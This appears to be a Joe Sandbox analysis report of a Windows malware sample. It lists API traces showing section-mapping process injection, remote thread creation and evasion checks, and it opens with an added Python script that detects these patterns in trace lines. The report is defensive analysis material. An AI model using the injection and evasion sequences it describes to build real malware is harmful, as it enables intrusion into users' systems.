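The NtCreateSection/NtMapViewOfSection pairs listed for the functions at 0x401549 and 0x401557, the SetErrorMode pair listed just above, and the Sleep call in the function at 0x4018e6 can be matched mechanically from the trace lines alone. The following is an added example, not part of this Joe Sandbox report and not code from the sample: a small Python rule set that parses API lines in the format the report prints and flags (1) a pagefile-backed section (SEC_COMMIT, no file handle) mapped into two different process handles, which is the map-view injection primitive (write through the local view, execute through the remote one), with the page protections decoded; (2) SetErrorMode(x) immediately followed by SetErrorMode(0); and (3) Sleep delays. Argument positions follow the documented NtCreateSection(SectionHandle, DesiredAccess, ObjectAttributes, MaximumSize, SectionPageProtection, AllocationAttributes, FileHandle) and NtMapViewOfSection(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize, SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect) prototypes. The sample input is copied from this report's own listings; the rule names, the treatment of a `?` argument as a handle known only at runtime, and the reading of the SetErrorMode pair as a mode round-trip check (the second call returns the mode set by the first) are assumptions of this example.

```python
"""Trace-pattern checks over API listings in the format this report prints.

Added example; not part of the Joe Sandbox report or of the sample's code.
Argument positions follow the documented NtCreateSection / NtMapViewOfSection
prototypes; rule names, thresholds and the reading of the SetErrorMode pair
as an emulator round-trip check are this example's own assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Standard Win32 page-protection values and the SEC_COMMIT allocation attribute.
PAGE_PROT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = 0x10 | 0x20 | 0x40 | 0x80
SEC_COMMIT = 0x08000000

# Constructed input: API lines copied from this report's listings.
SAMPLE_TRACE = """\
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
• SetErrorMode.KERNELBASE(00000400,?,?,005F0223,?,?), ref: 005F0E19
• SetErrorMode.KERNELBASE(00000000,?,?,005F0223,?,?), ref: 005F0E1E
• Sleep.KERNELBASE(00001388), ref: 00401936
"""

# "<Api>.<Module>(<hex args>), ref: <call-site address>" as printed by the report.
LINE_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")


@dataclass
class Call:
    api: str
    module: str
    args: List[Optional[int]]  # None where the report printed '?'
    ref: int                   # call-site address


def parse_trace(text: str) -> List[Call]:
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.search(raw)
        if not m:
            continue
        api, module, argstr, ref = m.groups()
        args = ([None if a.strip() == "?" else int(a, 16) for a in argstr.split(",")]
                if argstr.strip() else [])
        calls.append(Call(api, module, args, int(ref, 16)))
    return calls


def find_section_injection(calls: List[Call]) -> List[Dict]:
    """Pagefile-backed section (SEC_COMMIT, FileHandle 0) whose views land in two
    different process handles: the map-view injection primitive.  Reports each
    such section and whether any protection involved is executable."""
    findings = []
    for i, c in enumerate(calls):
        if c.api != "NtCreateSection" or len(c.args) < 7:
            continue
        sect_prot, alloc_attr, file_handle = c.args[4], c.args[5], c.args[6]
        if alloc_attr != SEC_COMMIT or file_handle != 0:
            continue
        maps = []  # NtMapViewOfSection calls up to the next NtCreateSection
        for n in calls[i + 1:]:
            if n.api == "NtCreateSection":
                break
            if n.api == "NtMapViewOfSection" and len(n.args) >= 10:
                maps.append(n)
        handles = {m.args[1] for m in maps}  # ProcessHandle argument of each map
        if len(handles) < 2:
            continue
        prots = [p for p in [sect_prot] + [m.args[9] for m in maps] if p is not None]
        findings.append({
            "section_ref": c.ref,
            "map_refs": [m.ref for m in maps],
            "remote_handle_unknown": None in handles,  # '?' = handle known only at runtime
            "executable": any(p & EXECUTABLE for p in prots),
            "protections": [PAGE_PROT.get(p, hex(p)) for p in prots],
        })
    return findings


def find_seterrormode_roundtrip(calls: List[Call]):
    """SetErrorMode(x != 0) directly followed by SetErrorMode(0): the second call
    returns the mode set by the first, so the caller can compare it with x
    (assumed check for an environment that does not track the mode)."""
    return [(a.ref, b.ref, a.args[0])
            for a, b in zip(calls, calls[1:])
            if a.api == b.api == "SetErrorMode" and a.args and b.args
            and a.args[0] not in (0, None) and b.args[0] == 0]


def sleep_delays_ms(calls: List[Call]) -> List[int]:
    return [c.args[0] for c in calls
            if c.api == "Sleep" and c.args and c.args[0] is not None]


def analyse(text: str) -> Dict:
    calls = parse_trace(text)
    return {
        "injection": find_section_injection(calls),
        "seterrormode": find_seterrormode_roundtrip(calls),
        "sleep_ms": sleep_delays_ms(calls),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(SAMPLE_TRACE), indent=2))
```

Run stand-alone it prints the findings as JSON. Both sections come back as mapped into two distinct handles, but only the second one (created at 0x401682 with PAGE_EXECUTE_READWRITE, mapped locally as PAGE_READWRITE and into the unknown handle as PAGE_EXECUTE_READ) is flagged executable; the SetErrorMode pair at 0x5f0e19/0x5f0e1e and the 5000 ms Sleep are reported alongside it.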

                                                                                                                             Control-flow Graph
                                                                                                                             • Function entry 0x4016e5 (rendered graph omitted; blocks 0x4016e5-0x4018e3). Block 0x4017cf calls 0x4017d4; 0x401874 calls HeapCreate; 0x4018bc calls 0x401193.
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c9d1cf4a24c3fc6c96abbd772e43917d0267fad9e090bec43cac2cfb706a48c3
                                                                                                                            • Instruction ID: d7122d48263ec7d897cf7d78cd76de1228cda3bcac40411fc7d625d9091ea59c
                                                                                                                            • Opcode Fuzzy Hash: c9d1cf4a24c3fc6c96abbd772e43917d0267fad9e090bec43cac2cfb706a48c3
                                                                                                                            • Instruction Fuzzy Hash: AC41CE37908104DBDB14AA54C844ABA73A1AF84304F39853BD857776F0D67CAA43E79F

                                                                                                                             Control-flow Graph
                                                                                                                             • Function entry 0x4018e6 (rendered graph omitted; blocks 0x4018e6-0x4019a5). Block 0x4018e6 calls 0x401193, Sleep and 0x40141f; 0x40194d calls 0x401514 (whose NtDuplicateObject, NtCreateSection and NtMapViewOfSection calls are listed as subcalls); 0x40195a calls 0x401193.
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0

Control-flow Graph (rendered graph not reproduced; basic blocks and edges listed below)
• Block 401915-401918: branches to 4018c6-4018c7 and 40191a-40194b
• Block 4018c6-4018c7: branches to 4018d7 and 4018ce-4018e3
• Block 4018d7: continues to 4018ce-4018e3
• Block 4018ce-4018e3: call 401193
• Block 40191a-40194b: call 401193, Sleep, call 40141f; branches to 40195a-4019a5 and 40194d-401955
• Block 40194d-401955: call 401514; continues to 40195a-4019a5
• Block 40195a-4019a5: call 401193
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0

Control-flow Graph (rendered graph not reproduced; basic blocks and edges listed below)
• Block 4018f1-40194b: call 401193, Sleep, call 40141f; branches to 40195a-4019a5 and 40194d-401955
• Block 40194d-401955: call 401514; continues to 40195a-4019a5
• Block 40195a-4019a5: call 401193
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00622717
Memory Dump Source
• Source File: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_61f000_O4zPA1oI9Y.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• Sleep.KERNELBASE(00001388), ref: 00401936
  • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
  • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
  • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
Memory Dump Source
• Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectSleepView
• String ID:
• API String ID: 1885482327-0
APIs
• LocalAlloc.KERNELBASE(00000000,00514D6C,0041912F), ref: 00418AC8
Memory Dump Source
• Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
Similarity
• API ID: AllocLocal
• String ID:
• API String ID: 3494564517-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5f0000_O4zPA1oI9Y.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
Strings
Memory Dump Source
• Source File: 00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_61f000_O4zPA1oI9Y.jbxd
Yara matches
Similarity
• API ID:
• String ID: v"b
• API String ID: 0-2872282020
Strings
Memory Dump Source
• Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
Similarity
• API ID:
• String ID: #v
• API String ID: 0-4112121772
Strings
Memory Dump Source
• Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
Similarity
• API ID:
• String ID: #v
• API String ID: 0-4112121772
Strings
Memory Dump Source
• Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
Similarity
• API ID:
• String ID: #v
• API String ID: 0-4112121772
                                                                                                                            • Opcode ID: 102b48951598741f63d2bc3dccd8cbc6c8ba434529aa2a86973ea2f557790a04
                                                                                                                            • Instruction ID: ca511933a5b28aa85cb858a2c4f9adc3918de21c1b1b7b18f24455f842de9805
                                                                                                                            • Opcode Fuzzy Hash: 102b48951598741f63d2bc3dccd8cbc6c8ba434529aa2a86973ea2f557790a04
                                                                                                                            • Instruction Fuzzy Hash: 30F0E2A050D282EFDB0A1F2569288317F9C6A1670733801FFD083B91C2D13E4707A25F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-4112121772
                                                                                                                            • Opcode ID: e697506e40fc18b1e89b069197d835560c4ae47d934abc3c31fc06bf68063514
                                                                                                                            • Instruction ID: 6ca54dc93712ca672dcb2052c894f69c3c01cbab2e020e50f3e64b8dc9d16c88
                                                                                                                            • Opcode Fuzzy Hash: e697506e40fc18b1e89b069197d835560c4ae47d934abc3c31fc06bf68063514
                                                                                                                            • Instruction Fuzzy Hash: 39F0E56151D282ABDB1B4F2569550717F5C6A0770A72401FFD482B51C2E13E0717E24F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-4112121772
                                                                                                                            • Opcode ID: fb335cf0d47e54c0d4b163b58812e271318afe8484c0deefa432d84bf061ab59
                                                                                                                            • Instruction ID: b5625208c70294fe1d85df5a918749f501d715d6cf31fdde382de861c42b0134
                                                                                                                            • Opcode Fuzzy Hash: fb335cf0d47e54c0d4b163b58812e271318afe8484c0deefa432d84bf061ab59
                                                                                                                            • Instruction Fuzzy Hash: 65F02B91A1D3C15FDB631F7598191617FA86D6774931840FFD041A52D2F17E0B06D30B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233086581.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 0-4112121772
                                                                                                                            • Opcode ID: 0a82979ad1abcd90eb5fc18d9275e14ea313a28b34b7e2628bae92218518f56c
                                                                                                                            • Instruction ID: 3e9ee4a9669d4f407ff3dbfcbf3d4ca987626ae5d69e3fc9a3947ca81785133e
                                                                                                                            • Opcode Fuzzy Hash: 0a82979ad1abcd90eb5fc18d9275e14ea313a28b34b7e2628bae92218518f56c
                                                                                                                            • Instruction Fuzzy Hash: B2E0DFA064A6817BDB171F69AA190717F9C6A1BB0771801FFD081A92C2D17E0B16D34F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233359138.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_5f0000_O4zPA1oI9Y.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                            • Instruction ID: 863051e66c8a79b30188aad475c6f9cf6a4493174bac05a33afdcecc6e0a7bcc
                                                                                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                            • Instruction Fuzzy Hash: C801F7726016088FDF21DF60C804BBB37E9FB85306F0944A4DB06D72C3E378A8418B80
                                                                                                                            APIs
                                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418D84
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418D9F
                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418DC2
                                                                                                                            • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418DD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2776817195-0
                                                                                                                            • Opcode ID: f30173706c358a0a2784e69d0405cb642d2262f11b42eed8560d13ebc88a1c06
                                                                                                                            • Instruction ID: e6d39fe0092bbab876aaf39b699cc254fd154f119dceba652d6ce7d41ca7bd17
                                                                                                                            • Opcode Fuzzy Hash: f30173706c358a0a2784e69d0405cb642d2262f11b42eed8560d13ebc88a1c06
                                                                                                                            • Instruction Fuzzy Hash: CD01D870A402049BD760AFA4FC45BDA37B4E71C705F40806AF605962D0DE745988DF9A
                                                                                                                            APIs
                                                                                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418CE4
                                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418CF6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2233107637.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_40b000_O4zPA1oI9Y.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 2991353152-2547889144
                                                                                                                            • Opcode ID: 8d08779753d9f8bcff46eaf4c583cf6f56908dff42d916d2df929441dec03c69
                                                                                                                            • Instruction ID: 810f788c3858191b0e6f136e57086e392da7284b159ae35535647157417a7ca4
                                                                                                                            • Opcode Fuzzy Hash: 8d08779753d9f8bcff46eaf4c583cf6f56908dff42d916d2df929441dec03c69
                                                                                                                            • Instruction Fuzzy Hash: 7CF0C83150530496E7119FA5ED807EE7B69EB19320F60422EED0456281CB784D8597AA

Execution Graph

Execution Coverage: 10.1%
Dynamic/Decrypted Code Coverage: 26.2%
Signature Coverage: 0%
Total number of Nodes: 183
Total number of Limit Nodes: 6
execution_graph 3297 402e40 3299 402e37 3297->3299 3300 402edf 3299->3300 3301 4018e6 3299->3301 3302 4018f5 3301->3302 3303 40192e Sleep 3302->3303 3304 401949 3303->3304 3306 40195a 3304->3306 3307 401514 3304->3307 3306->3300 3308 401524 3307->3308 3309 4015c4 NtDuplicateObject 3308->3309 3317 401896 3308->3317 3310 4015e1 NtCreateSection 3309->3310 3309->3317 3311 401661 NtCreateSection 3310->3311 3312 401607 NtMapViewOfSection 3310->3312 3314 40168d 3311->3314 3311->3317 3312->3311 3313 40162a NtMapViewOfSection 3312->3313 3313->3311 3315 401648 3313->3315 3316 401697 NtMapViewOfSection 3314->3316 3314->3317 3315->3311 3316->3317 3318 4016be NtMapViewOfSection 3316->3318 3317->3306 3318->3317 3319 4016e0 3318->3319 3321 4016e5 3319->3321 3323 4016e7 3321->3323 3322 401874 HeapCreate 3324 401896 3322->3324 3323->3322 3324->3319 3490 401542 3491 40153b 3490->3491 3492 4015c4 NtDuplicateObject 3491->3492 3500 401896 3491->3500 3493 4015e1 NtCreateSection 3492->3493 3492->3500 3494 401661 NtCreateSection 3493->3494 3495 401607 NtMapViewOfSection 3493->3495 3497 40168d 3494->3497 3494->3500 3495->3494 3496 40162a NtMapViewOfSection 3495->3496 3496->3494 3498 401648 3496->3498 3499 401697 NtMapViewOfSection 3497->3499 3497->3500 3498->3494 3499->3500 3501 4016be NtMapViewOfSection 3499->3501 3501->3500 3502 4016e0 3501->3502 3503 4016e5 HeapCreate 3502->3503 3503->3502 3552 418d06 3553 418d10 3552->3553 3554 418cc0 SetPriorityClass 3553->3554 3555 418d2d 3553->3555 3554->3553 3587 402dd0 3588 402ddc 3587->3588 3589 4018e6 9 API calls 3588->3589 3590 402edf 3588->3590 3589->3590 3325 419250 3328 418df0 3325->3328 3327 419255 3329 418dfd 3328->3329 3330 418f00 7 API calls 3329->3330 3331 419046 3329->3331 3333 418f78 7 API calls 3330->3333 3332 419054 SetCommState 3331->3332 3338 41906d 3331->3338 3332->3331 3334 419024 3333->3334 3335 419018 ObjectPrivilegeAuditAlarmW 3333->3335 3336 419035 3334->3336 3337 41902d WaitForSingleObject 3334->3337 3335->3334 3336->3331 3337->3336 3339 41912a 3338->3339 3340 41907a 9 API calls 3338->3340 3352 418ac0 LocalAlloc 3339->3352 3347 419108 3340->3347 3344 41912f LoadLibraryA 3353 418af0 GetModuleHandleW GetProcAddress VirtualProtect 3344->3353 3345 41917d 3354 418d50 3345->3354 3347->3339 3348 419182 3349 4191c3 InterlockedCompareExchange 3348->3349 3350 4191a3 MoveFileW 3348->3350 3351 4191dd 3348->3351 3349->3348 3350->3348 3351->3327 3352->3344 3353->3345 3355 418d79 QueryDosDeviceW 3354->3355 3356 418d8a 3354->3356 3355->3356 3365 418c90 3356->3365 3359 418da5 3368 418cd0 3359->3368 3360 418d9d FreeEnvironmentStringsA 3360->3359 3363 418dd7 3363->3348 3364 418dbc HeapCreate GetNumaProcessorNode 3364->3363 3366 418ca1 FatalAppExitA GetModuleHandleA 3365->3366 3367 418cb3 3365->3367 3366->3367 3367->3359 3367->3360 3369 418cec 3368->3369 3370 418cde BuildCommDCBA 3368->3370 3371 418cf4 FreeEnvironmentStringsA 3369->3371 3374 418cfc 3369->3374 3370->3374 3371->3374 3372 418d2d 3372->3363 3372->3364 3374->3372 3375 418cc0 3374->3375 3378 418c40 3375->3378 3379 418c6b 3378->3379 3380 418c5c SetPriorityClass 3378->3380 3379->3374 3380->3379 3566 401915 3567 40191a 3566->3567 3568 4018c6 3566->3568 3569 40192e Sleep 3567->3569 3570 401949 3569->3570 3571 401514 8 API calls 3570->3571 3572 40195a 3570->3572 3571->3572 3381 6b003c 3382 6b0049 3381->3382 3394 6b0e0f SetErrorMode SetErrorMode 3382->3394 3387 6b0265 3388 6b02ce VirtualProtect 3387->3388 3390 6b030b 3388->3390 3389 6b0439 VirtualFree 3393 6b04be LoadLibraryA 3389->3393 3390->3389 3392 6b08c7 3393->3392 3395 6b0223 3394->3395 3396 6b0d90 3395->3396 3397 6b0dad 3396->3397 3398 6b0dbb GetPEB 3397->3398 3399 6b0238 VirtualAlloc 3397->3399 3398->3399 3399->3387 3404 402f97 3405 4030ee 3404->3405 3406 402fc1 3404->3406 3406->3405 3407 40307c RtlCreateUserThread NtTerminateProcess 3406->3407 3407->3405 3427 6b0001 3428 6b0005 3427->3428 3433 6b092b GetPEB 3428->3433 3430 6b0030 3435 6b003c 3430->3435 3434 6b0972 3433->3434 3434->3430 3436 6b0049 3435->3436 3437 6b0e0f 2 API calls 3436->3437 3438 6b0223 3437->3438 3439 6b0d90 GetPEB 3438->3439 3440 6b0238 VirtualAlloc 3439->3440 3441 6b0265 3440->3441 3442 6b02ce VirtualProtect 3441->3442 3444 6b030b 3442->3444 3443 6b0439 VirtualFree 3447 6b04be LoadLibraryA 3443->3447 3444->3443 3446 6b08c7 3447->3446 3452 6b0005 3453 6b092b GetPEB 3452->3453 3454 6b0030 3453->3454 3455 6b003c 7 API calls 3454->3455 3456 6b0038 3455->3456 3461 4018f1 3462 4018f6 3461->3462 3463 40192e Sleep 3462->3463 3464 401949 3463->3464 3465 401514 8 API calls 3464->3465 3466 40195a 3464->3466 3465->3466 3467 4016f5 3469 4016f6 3467->3469 3468 401874 HeapCreate 3470 401896 3468->3470 3469->3468 3400 401777 3402 40177a 3400->3402 3401 401874 HeapCreate 3403 401896 3401->3403 3402->3401 3408 7e0347 3409 7e0356 3408->3409 3412 7e0ae7 3409->3412 3413 7e0b02 3412->3413 3414 7e0b0b CreateToolhelp32Snapshot 3413->3414 3415 7e0b27 Module32First 3413->3415 3414->3413 3414->3415 3416 7e035f 3415->3416 3417 7e0b36 3415->3417 3419 7e07a6 3417->3419 3420 7e07d1 3419->3420 3421 7e07e2 VirtualAlloc 3420->3421 3422 7e081a 3420->3422 3421->3422 3548 402d7b 3551 402d38 3548->3551 3549 402dc7 3550 4018e6 9 API calls 3550->3549 3551->3548 3551->3549 3551->3550 3471 4014fe 3472 401506 3471->3472 3473 401531 3471->3473 3474 4015c4 NtDuplicateObject 3473->3474 3482 401896 3473->3482 3475 4015e1 NtCreateSection 3474->3475 3474->3482 3476 401661 NtCreateSection 3475->3476 3477 401607 NtMapViewOfSection 3475->3477 3479 40168d 3476->3479 3476->3482 3477->3476 3478 40162a NtMapViewOfSection 3477->3478 3478->3476 3480 401648 3478->3480 3481 401697 NtMapViewOfSection 3479->3481 3479->3482 3480->3476 3481->3482 3483 4016be NtMapViewOfSection 3481->3483 3483->3482 3484 4016e0 3483->3484 3485 4016e5 HeapCreate 3484->3485 3485->3484

Control-flow Graph

• Executed
• Not Executed
